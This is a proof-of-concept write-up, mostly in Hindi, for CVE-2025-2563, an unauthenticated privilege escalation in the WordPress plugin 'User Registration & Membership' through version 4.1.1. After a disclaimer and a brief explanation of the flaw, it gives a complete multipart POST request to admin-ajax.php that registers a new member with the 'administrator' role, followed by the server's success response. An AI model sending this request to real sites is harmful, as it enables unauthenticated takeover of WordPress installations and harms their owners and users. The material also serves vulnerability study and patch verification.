
CVE-2025-2563 PoC
इस CVE (कॉमन वल्नरेबिलिटीज़ एंड एक्सपोज़र) राइटअप में प्रस्तुत जानकारी केवल शैक्षिक और सूचनात्मक उद्देश्यों के लिए है। दी गई जानकारी सार्वजनिक रूप से उपलब्ध संसाधनों, शोध और लेखक द्वारा किए गए विश्लेषण पर आधारित है। यह सामग्री किसी भी अवैध गतिविधि, जिसमें हैकिंग, शोषण या सिस्टम तक अनधिकृत पहुंच शामिल है, को बढ़ावा देने या प्रोत्साहित करने के लिए नहीं है।
लेखक प्रस्तुत जानकारी के किसी भी दुरुपयोग के लिए कोई जिम्मेदारी नहीं लेता है। यह अनुशंसा की जाती है कि व्यक्ति और संगठन इस ज्ञान को जिम्मेदारी से और लागू कानूनों तथा विनियमों के अनुपालन में लागू करें। पाठकों को दृढ़ता से सलाह दी जाती है कि वे भेद्यताओं का परीक्षण केवल उचित प्राधिकरण के साथ नियंत्रित वातावरण में करें।
इस राइटअप के लेखक और योगदानकर्ता दुर्भावनापूर्ण गतिविधियों का समर्थन या प्रोत्साहन नहीं करते हैं और जिम्मेदार डिस्क्लोज़र तथा नैतिक हैकिंग प्रथाओं को प्रोत्साहित करते हैं।
वर्डप्रेस प्लगइन "User Registration & Membership" में एक गंभीर सुरक्षा भेद्यता खोजी गई है, जो सदस्यता वेबसाइट और पंजीकरण फॉर्म बनाने के लिए एक लोकप्रिय उपकरण है। CVE-2025-2563 के रूप में पहचानी गई यह खामी, CVSS स्कोर 9.8 रखती है, जो इसकी उच्च गंभीरता को दर्शाता है।
वर्डप्रेस के लिए User Registration & Membership प्लगइन, संस्करण 4.1.1 तक (4.1.1 सहित) विशेषाधिकार वृद्धि (privilege escalation) की भेद्यता से ग्रस्त है। यह 'prepare_members_data()' फ़ंक्शन में भूमिका प्रकार पर अपर्याप्त प्रतिबंधों के कारण होता है। यह बिना प्रमाणीकरण वाले हमलावरों (unauthenticated attackers) के लिए 'administrator' भूमिका के साथ नए उपयोगकर्ता खाते बनाना संभव बनाता है, निम्नलिखित शर्तों के साथ:
POST /wp-admin/admin-ajax.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Accept: */*
Host: hackthebox.test
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Content-Type: multipart/form-data; boundary=--------------------------189123966817005614765335
----------------------------189123966817005614765335
Content-Disposition: form-data; name="action"
user_registration_membership_register_member
----------------------------189123966817005614765335
Content-Disposition: form-data; name="security"
THE_NONCE_HERE
----------------------------189123966817005614765335
Content-Disposition: form-data; name="members_data"
{"membership":"MEMBERSHIP_ID","payment_method":"free","start_date":"2025-3-29","username":"REGISTERED_USERNAME","role":"administrator"}
----------------------------189123966817005614765335--
{
"success": true,
"data": {
"member_id": 24,
"transaction_id": "",
"message": "New member has been successfully created."
}
}
- https://plugins.trac.wordpress.org/browser/user-registration/tags/4.1.2/modules/membership/includes/Admin/Services/MembersService.php?rev=3259656#L106
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/user-registration/user-registration-membership-411-unauthenticated-privilege-escalation
- https://securityonline.info/wordpress-plugin-cve-2025-2563-scores-9-8-threatens-thousands-of-membership-sites/